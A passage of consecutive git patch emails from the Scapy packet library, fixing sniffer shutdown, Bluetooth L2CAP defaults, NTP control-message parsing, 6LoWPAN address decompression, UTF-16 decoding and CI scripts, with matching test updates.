sniff(offline=pcapng_path, session=TCPSession) + assert b"GET /pki/srv_key.pem HTTP/1.0\r\n" in packets[9].msg[0].data + assert b"BEGIN PRIVATE KEY" in packets[10].msg[0].data + assert b"GET /pki/srv_key.pem HTTP/1.0\r\n" in packets[27].inner.msg[0].data + assert b"BEGIN PRIVATE KEY" in packets[28].inner.msg[0].data conf = bck_conf = pcapng file with a non-UTF-8 Decryption Secrets Block From 0a366962c03aac2f72a0f1e56d12518667b72778 Mon Sep 17 00:00:00 2001 From: Louis Scalbert <47607835+louis-6wind@users.noreply.github.com> Date: Thu, 17 Jul 2025 02:40:44 +0200 Subject: [PATCH 1511/1632] Fix mistake in AsyncSniffer stop_cb (#4781) Co-authored-by: gpotter2 <10530980+gpotter2@users.noreply.github.com> --- scapy/sendrecv.py | 5 ++--- 1 file changed, 2 insertions(+), 3 deletions(-) diff --git a/scapy/sendrecv.py b/scapy/sendrecv.py index b742d1751d8..7f597b4495e 100644 --- a/scapy/sendrecv.py +++ b/scapy/sendrecv.py @@ -1400,9 +1400,8 @@ def stop(self, join=True): # type: (bool) -> Optional[PacketList] """Stops AsyncSniffer if not in async mode""" if self.running: - try: - self.stop_cb() - except AttributeError: + self.stop_cb() + if self.continue_sniff: raise Scapy_Exception( "Unsupported (offline or unsupported socket)" ) From 8ddf371ff04e85da81b42f536b767e029325fb02 Mon Sep 17 00:00:00 2001 From: XenoKovah <92380610+XenoKovah@users.noreply.github.com> Date: Wed, 16 Jul 2025 21:00:14 -0400 Subject: [PATCH 1512/1632] Bluetooth: L2CAP signaling channel: better default id, because 0 is an invalid id per the spec (#4734) * Better default, because 0 is a invalid id per the spec. This makes it so people don't need to override the default. * Fix the tests --------- Co-authored-by: Xeno Kovah Co-authored-by: gpotter2 <10530980+gpotter2@users.noreply.github.com> --- scapy/layers/bluetooth.py | 2 +- test/scapy/layers/bluetooth.uts | 21 ++++++++++++++------- 2 files changed, 15 insertions(+), 8 deletions(-) diff --git a/scapy/layers/bluetooth.py b/scapy/layers/bluetooth.py index 6885fb4f607..844d77319d8 100644 --- a/scapy/layers/bluetooth.py +++ b/scapy/layers/bluetooth.py @@ -330,7 +330,7 @@ class L2CAP_CmdHdr(Packet): 24: "credit_based_conn_resp", 25: "credit_based_reconf_req", 26: "credit_based_reconf_resp"}), - ByteField("id", 0), + ByteField("id", 1), LEShortField("len", None)] def post_build(self, p, pay): diff --git a/test/scapy/layers/bluetooth.uts b/test/scapy/layers/bluetooth.uts index 0d67222e63d..e359445c855 100644 --- a/test/scapy/layers/bluetooth.uts +++ b/test/scapy/layers/bluetooth.uts @@ -146,14 +146,20 @@ assert hci_cmd_le_read_buffer_size_v1.len == 0 + Bluetooth Transport Layers -= Test HCI_PHDR_Hdr += Test HCI_PHDR_Hdr piling up pkt = HCI_PHDR_Hdr()/HCI_Hdr()/HCI_ACL_Hdr()/L2CAP_Hdr()/L2CAP_CmdHdr()/L2CAP_InfoReq() -assert raw(pkt) == b'\x00\x00\x00\x00\x02\x00\x00\n\x00\x06\x00\x05\x00\n\x00\x02\x00\x00\x00' +assert raw(pkt) == b'\x00\x00\x00\x00\x02\x00\x00\n\x00\x06\x00\x05\x00\n\x01\x02\x00\x00\x00' pkt = HCI_PHDR_Hdr(raw(pkt)) assert HCI_Hdr in pkt assert L2CAP_InfoReq in pkt +assert pkt[L2CAP_Hdr].len == 6 +assert pkt[L2CAP_Hdr].cid == 5 +assert pkt[L2CAP_CmdHdr].code == 10 +assert pkt[L2CAP_CmdHdr].id == 1 +assert pkt[L2CAP_CmdHdr].len == 2 +assert len(pkt[L2CAP_InfoReq]) == 2 + HCI Commands @@ -607,13 +613,13 @@ a.show() = Basic HCI_ACL_Hdr build & dissect a = HCI_Hdr()/HCI_ACL_Hdr(handle=0xf4c, PB=2, BC=2, len=20)/L2CAP_Hdr(len=16)/L2CAP_CmdHdr(code=8, len=12)/L2CAP_EchoReq(data="AAAAAAAAAAAA") -assert raw(a) == b'\x02L\xaf\x14\x00\x10\x00\x05\x00\x08\x00\x0c\x00AAAAAAAAAAAA' +assert raw(a) == b'\x02L\xaf\x14\x00\x10\x00\x05\x00\x08\x01\x0c\x00AAAAAAAAAAAA' b = HCI_Hdr(raw(a)) assert a == b = Complex HCI - L2CAP build a = HCI_Hdr()/HCI_ACL_Hdr()/L2CAP_Hdr()/L2CAP_CmdHdr()/L2CAP_ConnReq(scid=1) -assert raw(a) == b'\x02\x00\x00\x0c\x00\x08\x00\x05\x00\x02\x00\x04\x00\x00\x00\x01\x00' +assert raw(a) == b'\x02\x00\x00\x0c\x00\x08\x00\x05\x00\x02\x01\x04\x00\x00\x00\x01\x00' a.show() = Complex HCI - L2CAP dissect @@ -624,19 +630,20 @@ assert a[L2CAP_InfoResp].data == b"debug" = HCI - L2CAP Echo test rq = HCI_Hdr()/HCI_ACL_Hdr()/L2CAP_Hdr()/L2CAP_CmdHdr()/L2CAP_EchoReq(data=b"data") -assert bytes(rq) == b'\x02\x00\x00\x0c\x00\x08\x00\x05\x00\x08\x00\x04\x00data' +assert bytes(rq) == b'\x02\x00\x00\x0c\x00\x08\x00\x05\x00\x08\x01\x04\x00data' rsp = HCI_Hdr()/HCI_ACL_Hdr()/L2CAP_Hdr()/L2CAP_CmdHdr()/L2CAP_EchoResp(data=b"data") -assert bytes(rsp) == b'\x02\x00\x00\x0c\x00\x08\x00\x05\x00\t\x00\x04\x00data' +assert bytes(rsp) == b'\x02\x00\x00\x0c\x00\x08\x00\x05\x00\t\x01\x04\x00data' assert rsp.answers(rq) = HCI - L2CAP Create Channel request p = HCI_Hdr()/HCI_ACL_Hdr()/L2CAP_Hdr()/L2CAP_CmdHdr()/L2CAP_Create_Channel_Request(psm="SDP") -assert bytes(p) == b'\x02\x00\x00\r\x00\t\x00\x05\x00\x0c\x00\x05\x00\x01\x00\x00\x00\x00' +assert bytes(p) == b'\x02\x00\x00\r\x00\t\x00\x05\x00\x0c\x01\x05\x00\x01\x00\x00\x00\x00' p = HCI_Hdr(bytes(p)) assert p[L2CAP_Create_Channel_Request].psm == 1 +assert p[L2CAP_Create_Channel_Request].scid == 0 = L2CAP Conn Answers a = HCI_Hdr(b'\x02\x00\x00\x0c\x00\x08\x00\x05\x00\x02\x00\x04\x00\x00\x00\x9a;') From b60b29b855ab2f14cedf1a71f6517542bf8eecdb Mon Sep 17 00:00:00 2001 From: gpotter2 <10530980+gpotter2@users.noreply.github.com> Date: Thu, 17 Jul 2025 03:27:47 +0200 Subject: [PATCH 1513/1632] Fix #4717 & cleanup NTP control (#4791) --- scapy/layers/ntp.py | 185 ++++++++++++-------------------------- test/scapy/layers/ntp.uts | 104 +++++++++++---------- 2 files changed, 117 insertions(+), 172 deletions(-) diff --git a/scapy/layers/ntp.py b/scapy/layers/ntp.py index c3d2cc111a9..e8739006f14 100644 --- a/scapy/layers/ntp.py +++ b/scapy/layers/ntp.py @@ -19,6 +19,7 @@ ByteEnumField, ByteField, ConditionalField, + FieldLenField, FieldListField, FixedPointField, FlagsField, @@ -28,8 +29,8 @@ LEIntField, LEShortField, MayEnd, + MultipleTypeField, PacketField, - PacketLenField, PacketListField, PadField, ShortField, @@ -37,6 +38,7 @@ StrField, StrFixedLenEnumField, StrFixedLenField, + StrLenField, XByteField, XStrFixedLenField, ) @@ -610,18 +612,6 @@ def __init__(self, details): } -class NTPStatusPacket(Packet): - """ - Packet handling a non specific status word. - """ - - name = "status" - fields_desc = [ShortField("status", 0)] - - def extract_padding(self, s): - return b"", s - - class NTPSystemStatusPacket(Packet): """ @@ -691,55 +681,6 @@ def extract_padding(self, s): return b"", s -class NTPControlStatusField(PacketField): - """ - This field provides better readability for the "status" field. - """ - - ######################################################################### - # - # RFC 1305 - ######################################################################### - # - # Appendix B.3. Commands // ntpd source code: ntp_control.h - ######################################################################### - # - - def m2i(self, pkt, m): - ret = None - association_id = struct.unpack("!H", m[2:4])[0] - - if pkt.err == 1: - ret = NTPErrorStatusPacket(m) - - # op_code == CTL_OP_READSTAT - elif pkt.op_code == 1: - if association_id != 0: - ret = NTPPeerStatusPacket(m) - else: - ret = NTPSystemStatusPacket(m) - - # op_code == CTL_OP_READVAR - elif pkt.op_code == 2: - if association_id != 0: - ret = NTPPeerStatusPacket(m) - else: - ret = NTPSystemStatusPacket(m) - - # op_code == CTL_OP_WRITEVAR - elif pkt.op_code == 3: - ret = NTPStatusPacket(m) - - # op_code == CTL_OP_READCLOCK or op_code == CTL_OP_WRITECLOCK - elif pkt.op_code == 4 or pkt.op_code == 5: - ret = NTPClockStatusPacket(m) - - else: - ret = NTPStatusPacket(m) - - return ret - - class NTPPeerStatusDataPacket(Packet): """ Packet handling the data field when op_code is CTL_OP_READSTAT @@ -752,71 +693,41 @@ class NTPPeerStatusDataPacket(Packet): PacketField("peer_status", NTPPeerStatusPacket(), NTPPeerStatusPacket), ] + def extract_padding(self, s): + return b"", s -class NTPControlDataPacketLenField(PacketLenField): +class NTPControlStatusField(PacketField): """ - PacketField handling the "data" field of NTP control messages. + The various types of the "status" field. """ - + # RFC 9327 sect 3 def m2i(self, pkt, m): - ret = None - if not m: - return ret - - # op_code == CTL_OP_READSTAT - if pkt.op_code == 1: - if pkt.association_id == 0: - # Data contains association ID and peer status - ret = NTPPeerStatusDataPacket(m) - else: - ret = conf.raw_layer(m) - else: - ret = conf.raw_layer(m) - - return ret + association_id = struct.unpack("!H", m[2:4])[0] - def getfield(self, pkt, s): - length = self.length_from(pkt) - i = None - if length > 0: - # RFC 1305 - # The maximum number of data octets is 468. - # - # include/ntp_control.h - # u_char data[480 + MAX_MAC_LEN]; /* data + auth */ - # - # Set the minimum length to 480 - 468 - length = max(12, length) - if length % 4: - length += (4 - length % 4) - try: - i = self.m2i(pkt, s[:length]) - except Exception: - if conf.debug_dissector: - raise - i = conf.raw_layer(load=s[:length]) - return s[length:], i + if pkt.err == 1: + return NTPErrorStatusPacket(m) + elif pkt.op_code in [4, 5]: # Read/write clock + return NTPClockStatusPacket(m) + else: + if association_id != 0: + return NTPPeerStatusPacket(m) + else: + return NTPSystemStatusPacket(m) class NTPControl(NTP): """ Packet handling NTP mode 6 / "Control" messages. """ - - ######################################################################### - # - # RFC 1305 - ######################################################################### - # - # Appendix B.3. Commands // ntpd source code: ntp_control.h - ######################################################################### - # - - name = "Control message" + deprecated_fields = { + "status_word": ("status", "2.6.2"), + } + # RFC 9327 sect 2 + name = "NTP Control message" match_subclass = True fields_desc = [ - BitField("zeros", 0, 2), + BitEnumField("leap", 0, 2, _leap_indicator), BitField("version", 2, 3), BitEnumField("mode", 6, 3, _ntp_modes), BitField("response", 0, 1), @@ -824,25 +735,45 @@ class NTPControl(NTP): BitField("more", 0, 1), BitEnumField("op_code", 0, 5, _op_codes), ShortField("sequence", 0), - ConditionalField(NTPControlStatusField( - "status_word", "", Packet), lambda p: p.response == 1), - ConditionalField(ShortField("status", 0), lambda p: p.response == 0), + MultipleTypeField( + [ + ( + ShortField("status", 0), + lambda pkt: pkt.response == 0 or pkt.op_code in [6, 7] + ) + ], + NTPControlStatusField("status", NTPSystemStatusPacket(), None), + ), ShortField("association_id", 0), ShortField("offset", 0), - ShortField("count", None), - MayEnd(NTPControlDataPacketLenField( - "data", "", Packet, length_from=lambda p: p.count)), + FieldLenField("count", None, length_of="data"), + MayEnd( + PadField( + MultipleTypeField( + # RFC 1305 + [ + ( + PacketListField( + "data", + "", + NTPPeerStatusDataPacket, + length_from=lambda p: p.count, + ), + lambda pkt: ( + pkt.response and + pkt.op_code == 1 and + pkt.association_id == 0 + ) + ), + ], + StrLenField("data", "", length_from=lambda pkt: pkt.count), + ), + align=4 + ) + ), PacketField("authenticator", "", NTPAuthenticator), ] - def post_build(self, p, pay): - if self.count is None: - length = 0 - if self.data: - length = len(self.data) - p = p[:11] + struct.pack("!H", length) + p[13:] - return p + pay - ############################################################################## # Private (mode 7) diff --git a/test/scapy/layers/ntp.uts b/test/scapy/layers/ntp.uts index 6ae79063f11..120e841200d 100644 --- a/test/scapy/layers/ntp.uts +++ b/test/scapy/layers/ntp.uts @@ -129,7 +129,7 @@ assert p.status == 0 assert p.association_id == 0 assert p.offset == 0 assert p.count == 0 -assert p.data is None +assert p.data == b"" = NTP Control (mode 6) - CTL_OP_READSTAT (2) - response @@ -143,26 +143,41 @@ assert p.err == 0 assert p.more == 0 assert p.op_code == 1 assert p.sequence == 12 -assert isinstance(p.status_word, NTPSystemStatusPacket) -assert p.status_word.leap_indicator == 0 -assert p.status_word.clock_source == 6 -assert p.status_word.system_event_counter == 6 -assert p.status_word.system_event_code == 4 +assert isinstance(p.status, NTPSystemStatusPacket) +assert p.status.leap_indicator == 0 +assert p.status.clock_source == 6 +assert p.status.system_event_counter == 6 +assert p.status.system_event_code == 4 assert p.association_id == 0 assert p.offset == 0 assert p.count == 4 -assert isinstance(p.data, NTPPeerStatusDataPacket) -assert p.data.association_id == 58876 -assert isinstance(p.data.peer_status, NTPPeerStatusPacket) -assert p.data.peer_status.configured == 1 -assert p.data.peer_status.auth_enabled == 1 -assert p.data.peer_status.authentic == 1 -assert p.data.peer_status.reachability == 1 -assert p.data.peer_status.reserved == 0 -assert p.data.peer_status.peer_sel == 6 -assert p.data.peer_status.peer_event_counter == 2 -assert p.data.peer_status.peer_event_code == 4 - +assert isinstance(p.data[0], NTPPeerStatusDataPacket) +assert p.data[0].association_id == 58876 +assert isinstance(p.data[0].peer_status, NTPPeerStatusPacket) +assert p.data[0].peer_status.configured == 1 +assert p.data[0].peer_status.auth_enabled == 1 +assert p.data[0].peer_status.authentic == 1 +assert p.data[0].peer_status.reachability == 1 +assert p.data[0].peer_status.reserved == 0 +assert p.data[0].peer_status.peer_sel == 6 +assert p.data[0].peer_status.peer_event_counter == 2 +assert p.data[0].peer_status.peer_event_code == 4 + += NTP Control (mode 6) - CTL_OP_READSTAT (3) - multi +s = b'\x16\x81\x00\x0f\x00\x14\x00\x00\x00\x00\x008Et\x00\x11Es\x00\x11Er\x00\x11Eq\x00\x11Ep6\x1aEo4\x14En3\x14Em4\x14El4\x1aEk4\x14Ej\x88\x11Ei\x88\x11Eh\x88\x11Eg\x88\x11' +p = NTP(s) +assert isinstance(p, NTPControl) +assert p.version == 2 +assert p.response == 1 +assert isinstance(p.status, NTPSystemStatusPacket) +assert p.count == 56 +assert len(p.data) == 14 +assert all(isinstance(x, NTPPeerStatusDataPacket) for x in p.data) +assert p.data[0].association_id == 17780 +assert p.data[10].association_id == 17770 +assert p.data[13].association_id == 17767 +assert p.data[13].peer_status.peer_event_counter == 1 +assert not p.authenticator = NTP Control (mode 6) - CTL_OP_READVAR (1) - request s = b'\x16\x02\x00\x12\x00\x00\xfc\x8f\x00\x00\x00\x00' @@ -175,7 +190,7 @@ assert p.op_code == 2 assert p.sequence == 18 assert p.status == 0 assert p.association_id == 64655 -assert p.data is None +assert p.data == b"" = NTP Control (mode 6) - CTL_OP_READVAR (2) - response (1st packet) @@ -189,22 +204,22 @@ assert p.err == 0 assert p.more == 1 assert p.op_code == 2 assert p.sequence == 18 -assert isinstance(p.status_word, NTPPeerStatusPacket) -assert p.status_word.configured == 1 -assert p.status_word.auth_enabled == 1 -assert p.status_word.authentic == 0 -assert p.status_word.reachability == 0 -assert p.status_word.peer_sel == 0 -assert p.status_word.peer_event_counter == 1 -assert p.status_word.peer_event_code == 1 +assert isinstance(p.status, NTPPeerStatusPacket) +assert p.status.configured == 1 +assert p.status.auth_enabled == 1 +assert p.status.authentic == 0 +assert p.status.reachability == 0 +assert p.status.peer_sel == 0 +assert p.status.peer_event_counter == 1 +assert p.status.peer_event_code == 1 assert p.association_id == 64655 assert p.offset == 0 assert p.count == 468 -assert p.data.load == b'srcadr=192.168.122.1, srcport=123, dstadr=192.168.122.100, dstport=123,\r\nleap=3, stratum=16, precision=-24, rootdelay=0.000, rootdisp=0.000,\r\nrefid=INIT, reftime=0x00000000.00000000, rec=0x00000000.00000000,\r\nreach=0x0, unreach=5, hmode=1, pmode=0, hpoll=6, ppoll=10, headway=62,\r\nflash=0x1200, keyid=1, offset=0.000, delay=0.000, dispersion=15937.500,\r\njitter=0.000, xleave=0.240,\r\nfiltdelay= 0.00 0.00 0.00 0.00 0.00 0.00 0.00 0.00,\r\nfiltoffset= 0.00 0.00 0.00 0.00 ' +assert p.data == b'srcadr=192.168.122.1, srcport=123, dstadr=192.168.122.100, dstport=123,\r\nleap=3, stratum=16, precision=-24, rootdelay=0.000, rootdisp=0.000,\r\nrefid=INIT, reftime=0x00000000.00000000, rec=0x00000000.00000000,\r\nreach=0x0, unreach=5, hmode=1, pmode=0, hpoll=6, ppoll=10, headway=62,\r\nflash=0x1200, keyid=1, offset=0.000, delay=0.000, dispersion=15937.500,\r\njitter=0.000, xleave=0.240,\r\nfiltdelay= 0.00 0.00 0.00 0.00 0.00 0.00 0.00 0.00,\r\nfiltoffset= 0.00 0.00 0.00 0.00 ' = NTP Control (mode 6) - CTL_OP_READVAR (3) - response (2nd packet) -s = b'\xd6\x82\x00\x12\xc0\x11\xfc\x8f\x01\xd4\x00i0.00 0.00 0.00 0.00,\r\nfiltdisp= 16000.00 16000.00 16000.00 16000.00 16000.00 16000.00 16000.00 16000.00\r\n\x00\x00\x00' +s = b'\xd6\x82\x00\x12\xc0\x11\xfc\x8f\x01\xd4\x00i0.00 0.00 0.00 0.00,\r\nfiltdisp= 16000.00 16000.00 16000.00 16000.00 16000.00 16000.00 16000.00 16000.00\r\n' p = NTP(s) assert isinstance(p, NTPControl) assert p.version == 2 @@ -214,11 +229,11 @@ assert p.err == 0 assert p.more == 0 assert p.op_code == 2 assert p.sequence == 18 -assert isinstance(p.status_word, NTPPeerStatusPacket) +assert isinstance(p.status, NTPPeerStatusPacket) assert p.association_id == 64655 assert p.offset == 468 assert p.count == 105 -assert p.data.load == b'0.00 0.00 0.00 0.00,\r\nfiltdisp= 16000.00 16000.00 16000.00 16000.00 16000.00 16000.00 16000.00 16000.00\r\n\x00\x00\x00' +assert p.data == b'0.00 0.00 0.00 0.00,\r\nfiltdisp= 16000.00 16000.00 16000.00 16000.00 16000.00 16000.00 16000.00 16000.00\r\n' = NTP Control (mode 6) - CTL_OP_READVAR (4) - request @@ -231,7 +246,7 @@ assert p.response == 0 assert p.err == 0 assert p.more == 0 assert p.op_code == 2 -assert len(p.data.load) == 12 +assert p.data == b"test1,test2" assert p.authenticator.key_id == 1 assert bytes_hex(p.authenticator.dgst) == b'3dc23bc7edb9555339d68908c8afa612' @@ -261,7 +276,7 @@ assert p.response == 0 assert p.err == 0 assert p.more == 0 assert p.op_code == 3 -assert len(p.data.load) == 12 +assert p.data == b"test1,test2" assert p.authenticator.key_id == 1 assert bytes_hex(p.authenticator.dgst) == b'aff10cb4c9946dfc4d90094aa170944a' @@ -276,9 +291,9 @@ assert p.response == 1 assert p.err == 1 assert p.more == 0 assert p.op_code == 3 -assert hasattr(p, 'status_word') -assert isinstance(p.status_word, NTPErrorStatusPacket) -assert p.status_word.error_code == 5 +assert hasattr(p, 'status') +assert isinstance(p.status, NTPErrorStatusPacket) +assert p.status.error_code == 5 assert not p.data assert p.authenticator.key_id == 1 assert bytes_hex(p.authenticator.dgst) == b'807a80fbafc470679853a8e57865811c' @@ -295,7 +310,7 @@ assert p.err == 0 assert p.more == 0 assert p.op_code == 8 assert p.count == 12 -assert p.data.load == b'controlkey 1' +assert p.data == b'controlkey 1' assert p.authenticator.key_id == 1 assert bytes_hex(p.authenticator.dgst) == b'eaa7aca81b6a9cdb58e1530d36fbefa4' @@ -311,7 +326,7 @@ assert p.err == 0 assert p.more == 0 assert p.op_code == 8 assert p.count == 18 -assert p.data.load == b'Config Succeeded\r\n\x00\x00' +assert p.data == b'Config Succeeded\r\n' assert p.authenticator.key_id == 1 assert bytes_hex(p.authenticator.dgst) == b'bfa6d85ff96d1e326c293caceec2a539' @@ -327,7 +342,7 @@ assert p.err == 0 assert p.more == 0 assert p.op_code == 9 assert p.count == 15 -assert p.data.load == b'ntp.test.2.conf\x00' +assert p.data == b'ntp.test.2.conf' assert p.authenticator.key_id == 1 assert bytes_hex(p.authenticator.dgst) == b'c9fb8abe3c605ffa36d218c3b7648923' @@ -343,7 +358,7 @@ assert p.err == 0 assert p.more == 0 assert p.op_code == 9 assert p.count == 42 -assert p.data.load == b"Configuration saved to 'ntp.test.2.conf'\r\n\x00\x00" +assert p.data == b"Configuration saved to 'ntp.test.2.conf'\r\n" assert p.authenticator.key_id == 1 assert bytes_hex(p.authenticator.dgst) == b'32c2ba59c533fe28f550e5a0860295d9' @@ -358,7 +373,7 @@ assert p.response == 0 assert p.err == 0 assert p.more == 0 assert p.op_code == 12 -assert p.data is None +assert p.data == b'' assert not p.authenticator @@ -372,7 +387,7 @@ assert p.response == 1 assert p.err == 0 assert p.more == 0 assert p.op_code == 12 -assert p.data.load == b'nonce=db4186a2e1d9022472e24bc9\r\n' +assert p.data == b'nonce=db4186a2e1d9022472e24bc9\r\n' assert not p.authenticator @@ -386,7 +401,7 @@ assert p.response == 0 assert p.err == 0 assert p.op_code == 10 assert p.count == 40 -assert p.data.load == b'nonce=db4186a2e1d9022472e24bc9, frags=32' +assert p.data == b'nonce=db4186a2e1d9022472e24bc9, frags=32' assert not p.authenticator = NTP Control (mode 6) - CTL_OP_READ_MRU (2) - response @@ -399,10 +414,9 @@ assert p.response == 1 assert p.err == 0 assert p.op_code == 10 assert p.count == 233 -assert p.data.load == b'nonce=db4186a2e2073198b93c6419, addr.0=192.168.122.100:123,\r\nfirst.0=0xdb418673.323e1a89, last.0=0xdb418673.323e1a89, ct.0=1,\r\nmv.0=36, rs.0=0x0, WWQ.0=18446744073709509383, now=0xdb4186a2.e20ff8f4,\r\nlast.newest=0xdb418673.323e1a89\r\n\x00\x00\x00' +assert p.data == b'nonce=db4186a2e2073198b93c6419, addr.0=192.168.122.100:123,\r\nfirst.0=0xdb418673.323e1a89, last.0=0xdb418673.323e1a89, ct.0=1,\r\nmv.0=36, rs.0=0x0, WWQ.0=18446744073709509383, now=0xdb4186a2.e20ff8f4,\r\nlast.newest=0xdb418673.323e1a89\r\n' assert not p.authenticator - ############ ############ + NTP Private (mode 7) tests From 6584ebe1c0070359b85332ff7251be178c6666c6 Mon Sep 17 00:00:00 2001 From: gpotter2 <10530980+gpotter2@users.noreply.github.com> Date: Thu, 17 Jul 2025 03:27:58 +0200 Subject: [PATCH 1514/1632] Fix decompression of 6LowPan src (#4792) --- scapy/layers/sixlowpan.py | 11 ++++++++--- test/scapy/layers/dot15d4.uts | 10 ++++++++++ 2 files changed, 18 insertions(+), 3 deletions(-) diff --git a/scapy/layers/sixlowpan.py b/scapy/layers/sixlowpan.py index 22bf979cf87..cdc7d829409 100644 --- a/scapy/layers/sixlowpan.py +++ b/scapy/layers/sixlowpan.py @@ -518,13 +518,18 @@ def _extract_upperaddress(pkt, source=True): # https://tools.ietf.org/html/rfc2464#section-4 return LINK_LOCAL_PREFIX[:8] + addr[:3] + b"\xff\xfe" + addr[3:] elif type(underlayer) == Dot15d4Data: - addr = underlayer.src_addr if source else underlayer.dest_addr + if source: + addr = underlayer.src_addr + addrmode = underlayer.underlayer.fcf_srcaddrmode + else: + addr = underlayer.dest_addr + addrmode = underlayer.underlayer.fcf_destaddrmode addr = struct.pack(">Q", addr) - if underlayer.underlayer.fcf_destaddrmode == 3: # Extended/long + if addrmode == 3: # Extended/long tmp_ip = LINK_LOCAL_PREFIX[0:8] + addr # Turn off the bit 7. return tmp_ip[0:8] + struct.pack("B", (orb(tmp_ip[8]) ^ 0x2)) + tmp_ip[9:16] # noqa: E501 - elif underlayer.underlayer.fcf_destaddrmode == 2: # Short + elif addrmode == 2: # Short return ( LINK_LOCAL_PREFIX[0:8] + b"\x00\x00\x00\xff\xfe\x00" + diff --git a/test/scapy/layers/dot15d4.uts b/test/scapy/layers/dot15d4.uts index cff0ca25ddc..3562a8e579e 100644 --- a/test/scapy/layers/dot15d4.uts +++ b/test/scapy/layers/dot15d4.uts @@ -375,6 +375,16 @@ packet.show2() assert packet[LoWPAN_IPHC].src == 'fe80::ff:fe00:0' assert packet[LoWPAN_IPHC].dst == 'fe80::ff:fe00:ffff' += SixLoWPAN - Advanced 4 - SAM=3/SAC=0 decompression + +packet = Dot15d4(b'A\xc8t\xcd\xab\xff\xff\xcf\r\xa4\xfe\xffn\x95\xe4z;:\x1a\x9b\x01\xd4^\x1e\xdc\x02\xba\x95\x7f\x00\x00\x00\x01\x00\x00\x00\x00\x00\x00\xe6\x95n\xff\xfe\xaf\xff\xfd\x08\x1e@@\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x03\x16\x80\x10\xff\xff\xff\xff\x00\x01\x00\x00\x00\x00\x00\x00\xe6\x95n\xff\xfe\xa4\x05O') +assert packet[LoWPAN_IPHC].sac == 0 +assert packet[LoWPAN_IPHC].sam == 3 +assert packet[LoWPAN_IPHC].dac == 0 +assert packet[LoWPAN_IPHC].dam == 3 +assert packet[LoWPAN_IPHC].src == "fe80::e695:6eff:fea4:dcf" +assert packet[LoWPAN_IPHC].dst == "ff02::1a" + = SixLoWPAN - Using ICMP #ICMP: Neighbour Solicitation From e2941ba69c8fe4dc6b68746290a006e48b16f641 Mon Sep 17 00:00:00 2001 From: Evgeny Vereshchagin Date: Thu, 17 Jul 2025 12:48:13 +0300 Subject: [PATCH 1515/1632] packit: allow SHA-1 signatures when tests are run (#4796) --- .packit.yml | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/.packit.yml b/.packit.yml index 55dcc0a94a3..55c09aff689 100644 --- a/.packit.yml +++ b/.packit.yml @@ -17,7 +17,7 @@ actions: - "git clone https://src.fedoraproject.org/rpms/scapy .packit_rpm --depth=1" # Drop the "sources" file so rebase-helper doesn't think we're a dist-git - "rm -fv .packit_rpm/sources" - - "sed -i '/^# check$/a%check\\nOPENSSL_CONF=$(python3 ./.config/ci/openssl.py) ./test/run_tests -c test/configs/linux.utsc -K ci_only -K scanner' .packit_rpm/scapy.spec" + - "sed -i '/^# check$/a%check\\nOPENSSL_ENABLE_SHA1_SIGNATURES=1 OPENSSL_CONF=$(python3 ./.config/ci/openssl.py) ./test/run_tests -c test/configs/linux.utsc -K ci_only -K scanner' .packit_rpm/scapy.spec" - "sed -i '/^BuildArch/aBuildRequires: can-utils' .packit_rpm/scapy.spec" - "sed -i '/^BuildArch/aBuildRequires: libpcap' .packit_rpm/scapy.spec" - "sed -i '/^BuildArch/aBuildRequires: openssl' .packit_rpm/scapy.spec" From b54fdb7d0f33a3c8ba08bb941db3317afb5ee6d0 Mon Sep 17 00:00:00 2001 From: gpotter2 <10530980+gpotter2@users.noreply.github.com> Date: Fri, 18 Jul 2025 17:45:14 +0200 Subject: [PATCH 1516/1632] Fix bad UTF16 decoding on big endian (#4797) --- scapy/layers/msrpce/mseerr.py | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/scapy/layers/msrpce/mseerr.py b/scapy/layers/msrpce/mseerr.py index 8d65ba215df..7c32fe21fc8 100644 --- a/scapy/layers/msrpce/mseerr.py +++ b/scapy/layers/msrpce/mseerr.py @@ -623,7 +623,7 @@ def show(self) -> None: if err.ComputerName.Type == EEComputerNamePresent.eecnpPresent: print( " | ComputerName:", - err.ComputerName.value.value.valueof("pString").decode("utf-16"), + err.ComputerName.value.value.valueof("pString").decode("utf-16le"), ) print( " | Generating Component:", From e20f373c33947036ce9cc02f1c8da347885ccae9 Mon Sep 17 00:00:00 2001 From: gpotter2 <10530980+gpotter2@users.noreply.github.com> Date: Wed, 30 Jul 2025 03:04:57 +0200 Subject: [PATCH 1517/1632] Fix windows CI (#4807) --- .config/ci/windows/InstallNpcap.ps1 | 4 ++-- 1 file changed, 2 insertions(+), 2 deletions(-) diff --git a/.config/ci/windows/InstallNpcap.ps1 b/.config/ci/windows/InstallNpcap.ps1 index 70024095784..347b7eb2420 100644 --- a/.config/ci/windows/InstallNpcap.ps1 +++ b/.config/ci/windows/InstallNpcap.ps1 @@ -22,8 +22,8 @@ function checkTheSum($file, $hash) { function DownloadNPCAP_free { $file = $PSScriptRoot+"\npcap-0.96.exe" $hash = "83667e1306fdcf7f9967c10277b36b87e50ee8812e1ee2bb9443bdd065dc04a1" - # Download the 0.96 file from nmap servers - Invoke-WebRequest "https://npcap.com/dist/npcap-0.96.exe" -UseBasicParsing -OutFile $file + # Download the 0.96 file from a copy :/ It was taken down from official servers. + Invoke-WebRequest "https://github.com/secdev/secdev.github.io/raw/refs/heads/master/public/ci/npcap-0.96.exe" -UseBasicParsing -OutFile $file return checkTheSum $file $hash } From 723441d249dea04c4b904861c06ddb1a4d5c93aa Mon Sep 17 00:00:00 2001 From: Abhishek Pandey <87481264+AbhishekPandey1998@users.noreply.github.com> Date: Wed, 30 Jul 2025 06:38:21 +0530 Subject: [PATCH 1518/1632] typing: Add type annotation and override PcapReader.iter for mypy static type checking (#4803) --- scapy/utils.py | 4 ++++ 1 file changed, 4 insertions(+) diff --git a/scapy/utils.py b/scapy/utils.py index f7ecf6d447c..0c93f630dc6 100644 --- a/scapy/utils.py +++ b/scapy/utils.py @@ -1623,6 +1623,10 @@ def recv(self, size=MTU, **kwargs): # type: ignore # type: (int, **Any) -> Packet return self.read_packet(size=size, **kwargs) + def __iter__(self): + # type: () -> PcapReader + return self + def __next__(self): # type: ignore # type: () -> Packet try: From 974102f8f19887148e6cdd355505d42ea69e32c4 Mon Sep 17 00:00:00 2001 From: pemanpro <118881474+pemanpro@users.noreply.github.com> Date: Wed, 30 Jul 2025 03:10:36 +0200 Subject: [PATCH 1519/1632] Change 